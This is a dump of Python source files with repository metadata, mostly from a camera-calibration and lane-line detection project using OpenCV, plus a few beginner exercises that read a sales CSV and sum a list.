white_line_mask)\n return cv2.bitwise_and(img, img, mask = cmb_mask)\n\n\ndef select_lines_in_colorspaces(image):\n img = np.copy(image)\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n lab = cv2.cvtColor(img, cv2.COLOR_RGB2Luv)\n luv = cv2.cvtColor(img, cv2.COLOR_RGB2Lab)\n \n s = hls[:,:,2]\n s_lower_thresh = 180\n s_upper_thresh = 255\n s_binary = np.zeros_like(s)\n s_binary[(s >= s_lower_thresh) & (s <= s_upper_thresh)] = 1\n \n b = lab[:,:,2]\n b_lower_thresh = 160\n b_upper_thresh = 200\n b_binary = np.zeros_like(b)\n b_binary[(b >= b_lower_thresh) & (b <= b_upper_thresh)] = 1\n \n l = luv[:,:,0]\n l_lower_thresh = 210\n l_upper_thresh = 255\n l_binary = np.zeros_like(l)\n l_binary[(l >= l_lower_thresh) & (l <= l_upper_thresh)] = 1\n \n binary_comb = np.zeros_like(s)\n binary_comb[(l_binary == 1) | (b_binary == 1)] = 1\n \n return binary_comb\n\n\n# Implement HLS (s-channel) filtering\ndef apply_saturation_mask(image):\n img = np.copy(image)\n \n s = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)[:,:,2]\n \n thresh = (100, 255)\n binary_output = np.zeros_like(s)\n binary_output[(s >= thresh[0]) & (s <= thresh[1])] = 1\n\n return binary_output\n\n\n# Combine color and gradient filtering\ndef apply_saturation_and_gradient_masks(image):\n img = np.copy(image)\n \n kernel_size = 3\n s = apply_saturation_mask(image)\n dx = abs_sobel_thresh(img, 'x', kernel_size, (20, 100))\n dy = abs_sobel_thresh(img, 'y', kernel_size, (20, 100))\n mag = mag_thresh(img, kernel_size, (30, 100))\n direction = dir_threshold(img, kernel_size, (0.7, 1.3))\n comb = np.zeros_like(direction) \n #comb[((dx == 1) & (dy == 1)) | ((mag == 1) & (direction == 1)) | (s == 1)] = 1\n comb[((dx == 1) & (dy == 1)) | (s == 1)] = 1\n \n return comb\n\n\n# Tunable Filter Hyperparameters\ndef apply_saturation_mask2(image_id, kernel_size, thresh_low, thresh_high):\n img = np.copy(helpers.test_images_undst[image_id])\n warp, m, mInv = helpers.get_lane_perspective(img)\n hls_img = select_lines_in_hls(warp)\n \n blur = cv2.GaussianBlur(hls_img, (kernel_size, kernel_size), 0)\n \n s = cv2.cvtColor(blur, cv2.COLOR_RGB2HLS)[:,:,2]\n \n thresh = (thresh_low, thresh_high)\n binary_output = np.zeros_like(s)\n binary_output[(s >= thresh[0]) & (s <= thresh[1])] = 1\n\n plt.imshow(binary_output, cmap='gray')\n\n\ndef apply_sat_and_grad_masks(img_id, ksize, dxl, dxh, dyl, dyh, magl, magh, dirl, dirh):\n img = np.copy(helpers.test_images_undst[img_id])\n warp, m, mInv = helpers.get_lane_perspective(img)\n \n kernel_size = ksize\n s = apply_saturation_mask(warp)\n dx = abs_sobel_thresh(warp, 'x', kernel_size, (dxl, dxh))#20,100\n dy = abs_sobel_thresh(warp, 'y', kernel_size, (dyl, dyh)) #20,100\n mag = mag_thresh(warp, kernel_size, (magl, magh)) #30,100\n print(dirl, dirh)\n direction = dir_threshold(img, kernel_size, (dirl, dirh)) #0.7, 1.3\n comb = np.zeros_like(direction) \n comb[((dx == 1) & (dy == 1)) | ((mag == 1) & (direction == 1)) | (s == 1)] = 1\n plt.imshow(comb)\n\n\ndef apply_colorspace_masks(img_id, satl, sath, bl, bh, ll, lh):\n img = np.copy(helpers.test_images_undst[img_id])\n warp, m, mInv = helpers.get_lane_perspective(img)\n\n hls = cv2.cvtColor(warp, cv2.COLOR_RGB2HLS)\n lab = cv2.cvtColor(warp, cv2.COLOR_RGB2Luv)\n luv = cv2.cvtColor(warp, cv2.COLOR_RGB2Lab)\n \n s = hls[:,:,2]\n s_binary = np.zeros_like(s)\n s_binary[(s >= satl) & (s <= sath)] = 1\n \n b = lab[:,:,2]\n b_binary = np.zeros_like(b)\n b_binary[(b >= bl) & (b <= bh)] = 1\n \n l = luv[:,:,0]\n l_binary = np.zeros_like(l)\n l_binary[(l >= ll) & (l <= lh)] = 1\n \n binary_comb = np.zeros_like(s)\n binary_comb[((l_binary == 1) | (b_binary == 1)) & (s_binary == 1)] = 1\n \n plt.imshow(binary_comb, cmap='gray')"
},
{
"alpha_fraction": 0.6320633888244629,
"alphanum_fraction": 0.6543083786964417,
"avg_line_length": 41.2864875793457,
"blob_id": "e43c6b17c2c37ebc60061f0dd9014d609ee49de1",
"content_id": "43b4ad33fef8358197f3ad0dd770c521e5aa6c8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7822,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 185,
"path": "/lane_finding.py",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport helpers\nimport line\nimport filters\n\n# Use the interact widget to help with parameter tuning\nfrom IPython.html.widgets import *\n\ndef find_lane(camera, image): \n img = np.copy(image)\n \n #Undistort image\n undist_img = camera.undistort(img)\n \n # Apply various filters to obtain lane lines from image\n masked_img = filters.select_lines_in_colorspaces(undist_img)\n \n # Get lane perspective\n warped_image, M, Minv = helpers.get_lane_perspective(masked_img)\n \n if left_lane_line.detected and right_lane_line.detected:\n # Use the search around poly function here\n leftx, lefty, rightx, righty = helpers.search_around_poly2(warped_image, left_lane_line.get_last_fit(), right_lane_line.get_last_fit())\n else: \n # Get lane line pixels via sliding window search\n leftx, lefty, rightx, righty, out_img = helpers.find_lane_pixels(warped_image)\n\n if len(leftx) > 0 and len(lefty) > 0 and len(rightx) > 0 and len(righty) > 0: \n # Fit polynomial lines to lanes\n left_fit, left_fitx, right_fit, right_fitx, ploty = helpers.fit_poly(warped_image.shape, leftx, lefty, rightx, righty)\n\n # Get curve radius and lane offset from lane lines\n left_curve_rad, right_curve_rad, lane_center_offset = measure_curvature_pixels_and_lane_offset(warped_image.shape, ploty, left_fitx, right_fitx, left_fit, right_fit)\n\n\n # Add current fit to Line class for each lane line\n left_lane_line.add_current_fit(left_fit, left_fitx, lane_center_offset, left_curve_rad)\n right_lane_line.add_current_fit(right_fit, right_fitx, lane_center_offset, right_curve_rad)\n \n # Calculate average curve radius for the two lane lines\n curve_rad_avg = np.mean([left_lane_line.get_curve_radius(), right_lane_line.get_curve_radius()])\n \n # Get vehicle center offset from lane center\n lane_center_offset = left_lane_line.line_base_pos\n \n # Draw the best_fit (averaged) lane lines onto the image\n weighted_img = draw_lane(undist_img, warped_image, left_lane_line.get_best_fit(), right_lane_line.get_best_fit(), Minv)\n\n # Return the image with the radius of curvature and vehicle location information displayed\n return draw_curve_radius_info(weighted_img, curve_rad_avg, lane_center_offset)\n\n\n# Calculate lane offset, then draw lane\ndef measure_curvature_pixels(ploty, leftx, rightx):\n '''\n Calculates the curvature of given polynomial functions in meters\n '''\n ym_per_pix = 30/720 # Meters per pixel in y-dimension\n xm_per_pix = 3.7/700 # Meters per pixel in x-dimension\n \n # Define the y-value at which the radius of curvature should be calculated. This will be the bottom of the image.\n y_eval = np.max(ploty)\n \n # Calculate the radius of curvature for each lane line\n left_curve_rad = None\n right_curve_rad = None\n \n # Fit a second order polynomial to pixel positions in each fake lane line\n left_fit_m = np.polyfit(ploty*ym_per_pix, leftx*xm_per_pix, 2)\n right_fit_m = np.polyfit(ploty*ym_per_pix, rightx*xm_per_pix, 2)\n \n if left_fit_m is not None:\n left_curve_rad = (((1 + (2*left_fit_m[0]*y_eval*ym_per_pix + left_fit_m[1])**2)**(3/2))/np.abs(2*left_fit_m[0]))\n \n if right_fit_m is not None:\n right_curve_rad = (((1 + (2*right_fit_m[0]*y_eval*ym_per_pix + right_fit_m[1])**2)**(3/2))/np.abs(2*right_fit_m[0]))\n \n return left_curve_rad, right_curve_rad\n\n\ndef measure_curvature_pixels_and_lane_offset(img_shape, ploty, leftx, rightx, lf, rf):\n '''\n Calculates the curvature of given polynomial functions in meters and calculates\n the distance between the centerline of the vehicle and the center of the lane.\n This assumes that the camera center is coincident with the centerline of the vehicle.\n '''\n height, width = img_shape[:2]\n y_eval = height\n left_location = (lf[0]*y_eval**2 + lf[1]*y_eval + lf[2])\n right_location = (rf[0]*y_eval**2 + rf[1]*y_eval + rf[2])\n \n ym_per_pix = 30/720 # Meters per pixel in y-dimension\n xm_per_pix = 3.7/(right_location-left_location) # Meters per pixel in x-dimension\n \n # Calculate lane center offset from image center\n lane_center_location = (left_location + right_location) / 2\n lane_offset = lane_center_location - width / 2 \n lane_offset_m = lane_offset * xm_per_pix # Lane offset in meters\n \n # Calculate the radius of curvature for each lane line\n left_curve_rad = None\n right_curve_rad = None\n \n # Fit a second order polynomial to pixel positions in each fake lane line\n left_fit_m = np.polyfit(ploty*ym_per_pix, leftx*xm_per_pix, 2)\n right_fit_m = np.polyfit(ploty*ym_per_pix, rightx*xm_per_pix, 2)\n \n if left_fit_m is not None:\n left_curve_rad = (((1 + (2*left_fit_m[0]*y_eval*ym_per_pix + left_fit_m[1])**2)**(3/2))/np.abs(2*left_fit_m[0]))\n \n if right_fit_m is not None:\n right_curve_rad = (((1 + (2*right_fit_m[0]*y_eval*ym_per_pix + right_fit_m[1])**2)**(3/2))/np.abs(2*right_fit_m[0]))\n \n return left_curve_rad, right_curve_rad, lane_offset_m\n\n\ndef draw_lane(prev_image, warped_image, left_fit, right_fit, minv):\n img = np.copy(prev_image)\n \n if left_fit is None or right_fit is None:\n return img\n \n # Create an image to draw lane lines on\n warped_zero = np.zeros_like(warped_image).astype(np.uint8)\n color_warp = np.dstack((warped_zero, warped_zero, warped_zero))\n \n height, width = warped_image.shape[:2]\n ploty = np.linspace(0, height-1, height)\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2] \n \n left_px = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n right_px = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pix = np.hstack((left_px, right_px))\n \n # Draw the lane back onto the warped image\n cv2.fillPoly(color_warp, np.int_([pix]), (0,255,0))\n cv2.polylines(color_warp, np.int32([left_px]), isClosed=False, color=(255,0,0), thickness=40)\n cv2.polylines(color_warp, np.int32([right_px]), isClosed=False, color=(0,0,255), thickness=40)\n \n # Unwarp the warped image\n unwarped_img = cv2.warpPerspective(color_warp, minv, (width, height))\n \n # Overlay the drawn lane onto the original image\n return cv2.addWeighted(img, 1, unwarped_img, 0.5, 0)\n\n\ndef draw_curve_radius_info(image, curve_rad, lane_center_dist):\n img = np.copy(image)\n height = img.shape[0] \n font = cv2.FONT_HERSHEY_TRIPLEX\n \n radius_text = 'Radius of curvature: '\n # Generate radius of curvature text\n if curve_rad < 1000: \n radius_text += '{:-4.2f}'.format(curve_rad) + 'm'\n else:\n radius_text += '{:-4.2f}'.format(curve_rad/1000) + 'km'\n \n # Generate lane center location text\n dist_from_center = '{:-4.3f}'.format(abs(lane_center_dist)) + 'm '\n loc_from_center = ''\n if lane_center_dist < 0:\n loc_from_center = dist_from_center + 'right of center'\n elif lane_center_dist > 0:\n loc_from_center = dist_from_center + 'left of center'\n else:\n loc_from_center = 'On center'\n \n location_text = 'Vehicle location: ' + loc_from_center\n \n # Add text to image \n cv2.putText(img, radius_text, (50, 50), font, 1.5, (200, 255, 200), 2, cv2.LINE_AA)\n cv2.putText(img, location_text, (50, 100), font, 1.5, (200, 255, 200), 2, cv2.LINE_AA)\n return img\n\n\nleft_lane_line = line.Line()\nright_lane_line = line.Line()\n#lane_img = find_lane(test_images_undst[3])\n#plt.imshow(lane_img)\n#plt.imsave(\"output_images/misc_images/lane_location_info.jpg\", lane_img)"
},
{
"alpha_fraction": 0.5322507619857788,
"alphanum_fraction": 0.5403698682785034,
"avg_line_length": 35.05691146850586,
"blob_id": "ec76577f95cec295fd5f3f88c5da1f909a7b6577",
"content_id": "38ea8d55e3e43bb24f50c545b3d4a0d002558115",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4434,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 123,
"path": "/line.py",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "# Class to store information about lane line instances\nimport numpy as np\n\nclass Line():\n def __init__(self):\n # Set a boolean value to true of a line was detected in the last iteration\n self.detected = False\n \n # Create an array to store the last nFits of lane lines for averaging\n self.nFits = 5\n self.recent_fits = []\n self.recent_x_values = [] \n \n # Average polynomial coefficients over the last nFits iterations\n # This will return three elements [y**2, y, b]\n self.best_fit = None\n \n # Average the x values over the the last nFits iterations\n # This will return an average across each array for the corresponding y-value\n self.bestx = None\n \n # Polynomial coefficients for current fit\n self.current_fit = [np.array([False])]\n \n # Curvature of the turn radius in meters\n self.radius_of_curvature = 0\n \n # Distance in meters of vehicle center from the lane line\n self.line_base_pos = 0\n \n # Store the difference between fit coefficients between the current and last fit\n # This will be used to threshold bad lines\n self.diffs = np.array([0,0,0], dtype='float')\n \n # x-values for detected line pixels\n self.allx = None\n \n # y-values for detected line pixels\n self.ally = None\n \n def add_current_fit(self, fit, xvals, lane_offset, roc):\n if fit is not None:\n if self.best_fit is not None:\n if self.__validate_current_fit(fit):\n self.__insert_fit(fit, xvals, lane_offset, roc)\n if len(self.recent_fits) > self.nFits:\n self.__drop_oldest_fit()\n else:\n # This is a bad fit as the thresholds have been exceeded, do not keep\n self.detected = False \n else:\n # The best fit has not been established. Update with this fit.\n if len(self.recent_fits) > 0:\n self.drop_oldest_fit()\n \n if len(self.recent_fits) == 0:\n # Take this as the first fit\n self.__insert_fit(fit, xvals, lane_offset, roc)\n else:\n self.detected = False\n\n \n def __calculate_best_fit(self):\n if len(self.recent_fits) > 0:\n self.best_fit = np.average(self.recent_fits, axis=0)\n self.bestx = np.average(self.recent_x_values, axis=0)\n else:\n self.best_fit = None\n self.bestx = None\n \n def __drop_oldest_fit(self):\n if len(self.recent_fits) > 0:\n self.recent_fits = self.recent_fits[1:]\n self.recent_x_values = self.recent_x_values[1:]\n \n # Recalculate best fit with fewer fits\n if len(self.recent_fits) > 0:\n self.__calculate_best_fit()\n \n def __insert_fit(self, fit, xvals, lane_offset, roc):\n self.detected = True\n self.line_base_pos = lane_offset\n self.radius_of_curvature = roc\n self.recent_x_values.append(xvals)\n self.recent_fits.append(fit)\n self.__calculate_best_fit()\n \n def __validate_current_fit(self, new_fit):\n # Thresholds must be set high enough that the vehicle can turn\n self.diffs = np.abs(new_fit - self.best_fit)\n if self.diffs[0] > 0.01 or self.diffs[1] > 1.0 or self.diffs[2] > 100.0:\n return False\n return True \n \n def get_best_fit(self):\n self.__calculate_best_fit()\n return self.best_fit\n \n def get_last_fit(self):\n if len(self.recent_fits) > 0:\n return self.recent_fits[-1]\n else:\n return None\n \n def get_curve_radius(self):\n return self.radius_of_curvature\n \n def reset(self):\n '''\n Clear all instance variables\n '''\n self.detected = False\n self.nFits = 5\n self.recent_fits = []\n self.recent_x_values = [] \n self.best_fit = None\n self.bestx = None\n self.current_fit = [np.array([False])]\n self.radius_of_curvature = 0\n self.line_base_pos = 0\n self.diffs = np.array([0,0,0], dtype='float')\n self.allx = None\n self.ally = None"
},
{
"alpha_fraction": 0.6123833656311035,
"alphanum_fraction": 0.6217133402824402,
"avg_line_length": 31.76388931274414,
"blob_id": "e3010473a25edc796cd64dd92353d6298cbda1bc",
"content_id": "551249f11bf5c960159f4e911607a079e1f76bc2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2358,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 72,
"path": "/camera.py",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "'''\nCreate an instance of a Camera that will store calibration matrix\ninformation. Export it out to a pickle file, which can then be\nreimported later when selecting a camera for use with the main\npipeline.\n'''\n\nimport cv2, os, glob\nimport numpy as np\nimport matplotlib.image as mpimg\n\nclass Camera():\n def __init__(self):\n self.obj_points = []\n self.img_points = []\n self.mtx = None\n self.dist = None\n self.ret = None\n self.rvecs = None\n self.tvecs = None\n\n self.nx = 9\n self.ny = 6\n #self.objp = None\n\n \n def calibrate(self, image_dir):\n '''\n Take an image, calibrate the camera, and then return the \n undistorted version of the provided image.\n Store the obj_points and img_points to the member variables.\n '''\n image_files = glob.glob(image_dir)\n self.generate_calibration_points(image_files)\n\n calibration_image = mpimg.imread(image_files[0])\n self.ret, self.mtx, self.dist, self.rvecs, self.tvecs = cv2.calibrateCamera(self.obj_points, self.img_points, calibration_image.shape[1:3], None, None)\n \n\n def undistort(self, image):\n '''\n Undistort an image from provided image and camera calibration\n values, then return it.\n '''\n return cv2.undistort(image, self.mtx, self.dist, None, self.mtx)\n\n \n # TODO: Add Chessboard Corners detection function to implement calibration matrix\n def findChessboardCorners(self, image):\n return cv2.findChessboardCorners(image, (self.nx, self.ny), None)\n\n \n def drawChessboardCorners(self, image, corners, ret):\n return cv2.drawChessboardCorners(image, (self.nx, self.ny), corners, ret)\n\n \n def generate_calibration_points(self, image_files):\n objp = np.zeros((self.ny*self.nx,3), np.float32)\n objp[:,:2] = np.mgrid[0:self.nx, 0:self.ny].T.reshape(-1,2)\n \n for fn in image_files:\n image = np.copy(mpimg.imread(fn))\n\n # Convert image to grayscale\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n # Find chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (self.nx, self.ny), None)\n\n if ret == True:\n self.img_points.append(corners)\n self.obj_points.append(objp)"
},
{
"alpha_fraction": 0.6217847466468811,
"alphanum_fraction": 0.6454293727874756,
"avg_line_length": 39.274898529052734,
"blob_id": "9da684d59f09f323bf1e4ee17f41296da6b0e08b",
"content_id": "f0e2b7e5e99058adc07ab29d35d622ce80d5942f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10108,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 251,
"path": "/helpers.py",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "# Helper Functions\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\n# Draw ROI on image to determine points to choose, then warp utilizing those lines.\ndef draw_ROI_lines(image):\n img = np.copy(image)\n (height, width) = img.shape [:2]\n vertices = [(120, height), (580, 450), (width-590, 450), (width-120, height)]\n\n cv2.line(img, vertices[0], vertices[1],(255,0,0), 5)\n cv2.line(img, vertices[1], vertices[2],(255,0,0), 5)\n cv2.line(img, vertices[2], vertices[3],(255,0,0), 5)\n \n plt.imshow(img)\n\n\n# Warp image - Perform Perspective Transform\ndef get_lane_perspective(image):\n img = np.copy(image)\n (height, width) = img.shape[:2]\n\n # Specify source points to transform\n top_left_corner = (588, 450)\n top_right_corner = (width-588, 450)\n bottom_right_corner = (width-120, height)\n bottom_left_corner = (120, height)\n src = np.float32([top_left_corner, top_right_corner, bottom_right_corner, bottom_left_corner])\n \n # Specify destination points to transform to\n dst_offset = width * 0.2\n dst = np.float32([[dst_offset,0], [width-dst_offset,0], [width-dst_offset, height], [dst_offset,height]])\n \n # Generate transformation matrices\n M = cv2.getPerspectiveTransform(src, dst)\n Minv = cv2.getPerspectiveTransform(dst, src)\n \n # Warp image to return\n warped = cv2.warpPerspective(img, M, (width, height), flags = cv2.INTER_LINEAR)\n\n return warped, M, Minv\n\n\n# Detect lane lines and fit polynomials\ndef hist(img):\n height, width = img.shape\n histogram = np.sum(img[height*2//3:, :], axis=0)\n return histogram\n\n\ndef find_lane_pixels(warped_image):\n # Get histogram to determine starting position of each lane line\n histogram = hist(warped_image)\n \n # Create an output image for drawing and visualization\n out_img = np.dstack((warped_image, warped_image, warped_image))*255\n\n # Split the image vertically into left and right halves\n midpoint = np.int(histogram.shape[0]//2)\n \n # Find the location of each lane line from the bottom of the image\n leftx_base = np.argmax(histogram[:midpoint])\n rightx_base = np.argmax(histogram[midpoint:])+midpoint\n\n # Set up sliding windows and hyperparameters\n nWindows = 10\n margin = 75\n min_pix = 50\n\n # Establish window height\n window_height = np.int(warped_image.shape[0]//nWindows)\n\n # Determine the x and y-positions of all pixels in the image\n nonzero = warped_image.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n\n # Set current position\n leftx_current = leftx_base\n rightx_current = rightx_base\n\n # Create lists for left and right lane indices\n left_lane_inds = []\n right_lane_inds = []\n\n # Fit a polynomial to the lane lines\n # Step through the windows\n for window in range(nWindows):\n # Identify the horizontal boundaries for the windows\n win_y_low = warped_image.shape[0] - (window + 1) * window_height\n win_y_high = warped_image.shape[0] - window * window_height\n win_x_left_low = leftx_current - margin\n win_x_left_high = leftx_current + margin\n win_x_right_low = rightx_current - margin\n win_x_right_high = rightx_current + margin\n\n # Draw the rectangular windows on the image\n cv2.rectangle(out_img, (win_x_left_low, win_y_low), (win_x_left_high, win_y_high), (0,255,0), 2)\n cv2.rectangle(out_img, (win_x_right_low, win_y_low), (win_x_right_high, win_y_high), (0,255,0), 2)\n\n # Identify the nonzero pixels inside of the window\n good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n (nonzerox >= win_x_left_low) & (nonzerox < win_x_left_high)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n (nonzerox >= win_x_right_low) & (nonzerox < win_x_right_high)).nonzero()[0]\n\n # Append these indices to the lists\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n\n # If the quantity of pixels found is greater than min_pix, re-center the next window\n # based upon their mean position.\n if len(good_left_inds) > min_pix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n\n if len(good_right_inds) > min_pix:\n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n\n\n # Concatenate the arrays of lane line indices\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n\n # Extract left and right positions of the pixels in the lane lines\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n\n return leftx, lefty, rightx, righty, out_img\n\n\ndef fit_polynomial(warped_image):\n # Get lane pixels\n leftx, lefty, rightx, righty, out_img = find_lane_pixels(warped_image)\n plt.imshow(out_img)\n \n # Fit a second order polynomial to each lane line\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n \n # Generate coordinates for plotting\n ploty = np.linspace(0, warped_image.shape[0]-1, warped_image.shape[0])\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n \n # Generate output image\n out_img[lefty, leftx] = [255, 0, 0]\n out_img[righty, rightx] = [0, 0, 255]\n \n plt.plot(left_fitx, ploty, color='yellow', lw=3)\n plt.plot(right_fitx, ploty, color='yellow', lw=3)\n \n return out_img, left_fit, right_fit, ploty\n\n\ndef fit_poly(img_shape, leftx, lefty, rightx, righty):\n \n ploty = np.linspace(0, img_shape[0]-1, img_shape[0])\n left_fit = None\n right_fit = None\n left_fitx = None\n right_fitx = None \n \n # Fit a second order polynomial to each lane line and generate coordinates for plotting\n if len(leftx) > 0 and len(lefty) > 0:\n left_fit = np.polyfit(lefty, leftx, 2)\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n \n if len(rightx) > 0 and len(righty) > 0:\n right_fit = np.polyfit(righty, rightx, 2)\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n \n return left_fit, left_fitx, right_fit, right_fitx, ploty\n\n\ndef search_around_poly(warped_image):\n margin = 100\n \n # Determine the x and y-positions of all pixels in the image\n nonzero = warped_image.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n \n leftx, lefty, rightx, righty, out_img = find_lane_pixels(warped_image)\n \n # Fit new polynomials to the lane lines\n left_fit, left_fitx, right_fit, right_fitx, ploty = fit_poly(warped_image.shape, leftx, lefty, rightx, righty)\n \n # Determine the search area based upon the margin\n left_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2] - margin)) &\n (nonzerox < (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2] + margin)))\n right_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2] - margin)) &\n (nonzerox < (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2] + margin)))\n \n # Create visualization\n out_img = np.dstack((warped_image, warped_image, warped_image))*255\n window_img = np.zeros_like(out_img)\n \n # Add color to lane line pixels\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255,0,0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0,0,255]\n \n # Generate a polygon to identify the search window area\n left_line_window1 = np.array([np.transpose(np.vstack([left_fitx-margin, ploty]))])\n left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx+margin, ploty])))])\n left_line_pts = np.hstack((left_line_window1, left_line_window2))\n right_line_window1 = np.array([np.transpose(np.vstack([right_fitx-margin, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx+margin, ploty])))])\n right_line_pts = np.hstack((right_line_window1, right_line_window2))\n \n # Draw the lane lines onto the image\n cv2.fillPoly(window_img, np.int_([left_line_pts]),(0,255,0))\n cv2.fillPoly(window_img, np.int_([right_line_pts]),(0,255,0))\n result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n \n # Plot the polynomial lines\n plt.plot(left_fitx, ploty, color='yellow')\n plt.plot(right_fitx, ploty, color='yellow')\n \n return result\n\n\ndef search_around_poly2(warped_image, prev_left_fit, prev_right_fit):\n '''\n This function can be used to look around the previously found polynomial within\n the specified margin parameter to determine if another lane line can be found.\n \n This can help speed up the lane finding processing time for videos.\n '''\n margin = 100\n \n # Determine the x and y-positions of all pixels in the image\n nonzero = warped_image.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n \n # Determine the search area based upon the margin\n left_lane_inds = ((nonzerox > (prev_left_fit[0]*(nonzeroy**2) + prev_left_fit[1]*nonzeroy + prev_left_fit[2] - margin)) &\n (nonzerox < (prev_left_fit[0]*(nonzeroy**2) + prev_left_fit[1]*nonzeroy + prev_left_fit[2] + margin)))\n right_lane_inds = ((nonzerox > (prev_right_fit[0]*(nonzeroy**2) + prev_right_fit[1]*nonzeroy + prev_right_fit[2] - margin)) &\n (nonzerox < (prev_right_fit[0]*(nonzeroy**2) + prev_right_fit[1]*nonzeroy + prev_right_fit[2] + margin)))\n \n # Extract left and right positions of the pixels in the lane lines\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n \n return leftx, lefty, rightx, righty"
}
] | 7 |
elisagiacomini/programming.lab
|
https://github.com/elisagiacomini/programming.lab
|
7374340ed875b17702566f2e760b184a4abbb70d
|
03cef1f1befa3aeb0ccc74c89f5663bdc3e50712
|
0001e8b4a35ea0530cb0f6f803b896da96d06ce3
|
refs/heads/main
| 2023-01-27T17:46:24.651148 | 2020-12-01T16:03:04 | 2020-12-01T16:03:04 | 311,688,417 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6465827226638794,
"alphanum_fraction": 0.6645683646202087,
"avg_line_length": 36.03333282470703,
"blob_id": "532b7c342a0030b4a51b454156503d8d46260496",
"content_id": "bd32315e32d68b39405bb9d07e091ba6aaee37fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1124,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 30,
"path": "/temp/l5es.py",
"repo_name": "elisagiacomini/programming.lab",
"src_encoding": "UTF-8",
"text": "# Modificate l’oggetto CSVFile della lezione precedente in modo che dia un messaggio d’errore se si cerca di aprire un file non esistente. Poi, aggiungete questi due campi al file shampoo_sales.csv”:\n# 01-01-2015, \n# 01-02-2015, ciao\n# egestite gli errori che verranno generati in modo che le linee vengano saltate ma che venga stampato a schermo l’errore Alla fine ricordatevi di committare tutto.\n\n# Inizializzo una lista vuota per salvare i valori\nvalues = []\n\ntry:\n# Apro e leggo il file, linea per linea\n my_file = open('shampoo_sales_2.csv', 'r')\n\nexcept:\n print('Il file è inesistente.')\n\n for line in my_file:\n # Faccio lo split di ogni riga sulla virgola\n elements = line.split(',')\n \n # Se NON sto processando l’intestazione...\n if elements[0] != 'Date':\n # Setto la data e il valore\n date = elements[0]\n value = elements[1]\n # Aggiungo alla lista dei valori questo valore\n values.append(float(value))\n print(values)\n\nsomma = sum(values)\nprint('La somma dei valori della lista è: {}'.format(somma))\n\n"
},
{
"alpha_fraction": 0.6057692170143127,
"alphanum_fraction": 0.7115384340286255,
"avg_line_length": 34,
"blob_id": "fe75bb717f16b707bfaeafac476ae3a3cff580e1",
"content_id": "55c3414505dd932fcbbc5c6bb64a838dbdf594dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 105,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 3,
"path": "/sommalista.py",
"repo_name": "elisagiacomini/programming.lab",
"src_encoding": "UTF-8",
"text": "listavalori=[1,3,6,8,9,12,16,19]\nsomma=sum(listavalori)\nprint(\"La somma dei valori è: {}\".format(somma))"
},
{
